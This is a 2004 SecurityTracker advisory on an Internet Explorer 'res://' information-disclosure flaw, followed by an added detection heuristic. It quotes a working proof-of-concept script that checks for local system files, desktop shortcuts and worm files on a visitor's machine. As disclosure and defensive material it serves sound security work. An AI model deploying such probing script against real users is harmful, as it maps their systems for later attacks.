SecurityTracker.com
Category:   Application (Web Browser)  >   Microsoft Internet Explorer
Vendors:   Microsoft
Microsoft IE Discloses Whether Specified Files Exist to Remote Users
SecurityTracker Alert ID:  1012138
SecurityTracker URL:  http://securitytracker.com/id/1012138
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Nov 8 2004
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 6.00.2800
Description:   A vulnerability was reported in Microsoft Internet Explorer (IE). A remote user can determine if files exist in certain system directories.

Benjamin Tobias Franz reported that a remote user can create scripting code that, when loaded by the target user, will determine whether specified files exist in the WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND, Internet Explorer, and c:\ directories.

On some versions of IE, when using the 'res://' protocol to attempt to open a file, IE will open a new window if the specified file does not exist but not if the file exists. The scripting code can test this condition to determine if the file exists or not.

[Editor's note: We could not reproduce the results on 6.00.2900.]

Impact:   A remote user can determine if specified files in certain system directories exist on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/
Cause:   Access control error, State error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Microsoft Internet Explorer permits to examine the existence of local files


Microsoft Internet Explorer permits to examine the existence of local files


Description:
There is a security bug in Microsoft Internet Explorer which allows
checking for the existence of local files in system directories (Root (C:/),
WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND, Internet Explorer).
Successful exploitation allows the author of a malicious web site to plan
attacks against the target computer.
The bug occurs because Microsoft Internet Explorer does not open a window
if the target file exists, but it will open a window if the file does not
exist.
An attacker can also use this "feature" to verify the existence of local files
(e.g. system files, malware files, shortcuts on Desktop, ...).

Affected software:
Microsoft Internet Explorer

Workaround:
Deactivate "Active Scripting" in the IE options menu.

Proof-of-Concept exploit:

<textarea id="btft" rows="10" cols="75"></textarea><br>
<input type="text" id="btfn" value="iexplore.exe">
<input type="button" value="&gt; Search &gt;"
onClick="alert('File '+btfc(document.all.btfn.value));">

<script>

// Copyright (C) 2004 by Benjamin Tobias Franz (0-1-2-3@gmx.de)
//
// Search for files with known names in following directories:
// Root (C:/), WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND,
// Internet Explorer

function btfc(btfp){
var btfe=0,btfp;
try{window.open("res://"+btfp,"_search");}
catch(e){btfe=1;}
if(btfe==1)return "'"+btfp+"' exists!\n";
else return "'"+btfp+"' does NOT exist!\n";}

var btfd="",btfv="BTF-AntiVirus: Search for '";
btfd+="Search for system files ...\n";
btfd+=btfc("autoexec.bat");
btfd+=btfc("msdos.sys");
btfd+=btfc("twain.dll");
btfd+=btfc("swflash.ocx");
btfd+=btfc("shell32.dll");
btfd+=btfc("test.txt");
btfd+=btfc("test.btf");
btfd+="\nSearch for shortcut files (on desktop) ...\n";
btfd+=btfc("Microsoft Word.lnk");
btfd+=btfc("IrfanView.lnk");
btfd+=btfc("Opera.lnk");
btfd+=btfc("Mozilla.lnk");
btfd+=btfc("Netscape 6.lnk");
btfd+=btfc("Netscape 7.lnk");
btfd+=btfc("btf.lnk");
btfd+="\nSearch for virus/worm files ...\n";
btfd+=btfv+"Badtrans' : "+btfc("kernel32.exe");
btfd+=btfv+"MTX' : "+btfc("wsock32.mtx");
btfd+=btfv+"MyLife.j' : "+btfc("usa.scr");
btfd+=btfv+"MyLife.f' : "+btfc("list480.txt.scr");
btfd+=btfv+"MyLife.c' : "+btfc("list.txt.scr");
btfd+=btfv+"MyLife.b' : "+btfc("cari.scr");
btfd+=btfv+"MyLife.a' : "+btfc("my life.scr");
btfd+=btfv+"Gibe' : "+btfc("bctool.exe ");
btfd+=btfv+"Klez' : "+btfc("wqk.exe");
btfd+=btfv+"MyParty' : "+btfc("regctrl.exe");
btfd+=btfv+"Maldal' : "+btfc("win.exe");
btfd+=btfv+"Gokar' : "+btfc("karen.exe");

// ...

document.all.btft.value=
"Copyright (C) 2004 by Benjamin Tobias Franz (0-1-2-3@gmx.de)\n\n"+
btfd;
</script>


Date of discovery:
06. November 2004


Tested in Microsoft Internet Explorer 6 SP1 (6.0.2800.1106) with all
patches installed on Windows 98.


My DLL versions:

MSHTML.DLL: 6.00.2800.1477
BROWSEUI.DLL: 6.00.2800.1596 (xpsp2.040919-1003)
SHDOCVW.DLL: 6.00.2800.1596 (xpsp2.040919-1003)
SHLWAPI.DLL: 6.00.2800.1584 (xpsp2.040720-1705)
URLMON.DLL: 6.00.2800.1475
WININET.DLL: 6.00.2800.1475


Regards,
Benjamin Tobias Franz
Germany
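
A defender-side illustration of the behaviour described above, added here and not part of the SecurityTracker entry or the reporter's message: a static content-inspection heuristic (JavaScript for Node.js) that flags script passing a 'res://' URL to open() and notes when the call is wrapped in try. The function names, verdict labels and sample pages are assumptions constructed for this example.

```javascript
// Added example, not from the advisory. Sample pages below are constructed.
// Static heuristic for a content filter: flag script that hands a res:// URL
// to open(), and note when the call sits inside try { }, which is how the
// check described above reads its result.

// Collect inline <script> bodies and on* event-handler attribute values.
function extractScript(html) {
  const parts = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  const handlerRe = /\son[a-z]+\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) parts.push(m[1]);
  while ((m = handlerRe.exec(html)) !== null) parts.push(m[1] !== undefined ? m[1] : m[2]);
  return parts.join("\n");
}

// True when the text before a call ends inside an unclosed try { block.
// Braces inside string literals are not tracked; this is a heuristic.
function insideTry(before) {
  const re = /\btry\s*\{/g;
  let start = -1;
  while (re.exec(before) !== null) start = re.lastIndex;
  if (start === -1) return false;
  let depth = 1;
  for (const ch of before.slice(start)) {
    if (ch === "{") depth++;
    else if (ch === "}" && --depth === 0) return false;
  }
  return true;
}

function scanPage(html) {
  const js = extractScript(html);
  const resOpen = /\bopen\s*\(\s*["']res:\/\//gi; // open("res://...  any case
  let calls = 0, probes = 0, m;
  while ((m = resOpen.exec(js)) !== null) {
    calls++;
    if (insideTry(js.slice(0, m.index))) probes++;
  }
  const verdict = probes > 0 ? "alert" : calls > 0 ? "review" : "clean";
  return { calls, probes, verdict };
}

// Constructed sample pages: one with the described call pattern, one benign.
const PROBE_PAGE = '<script>function f(n){var hit=0;\n' +
  'try{window.open("res://"+n,"_search");}catch(e){hit=1;}return hit;}</script>';
const BENIGN_PAGE = '<a href="#" onclick="window.open(\'help.html\')">Help</a>' +
  '<script>try{init();}catch(e){}</script>';
console.log(scanPage(PROBE_PAGE), scanPage(BENIGN_PAGE));
```

The match is purely static and does not evaluate script, so a "clean" verdict only means this one pattern was not found in the page source.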

 
 

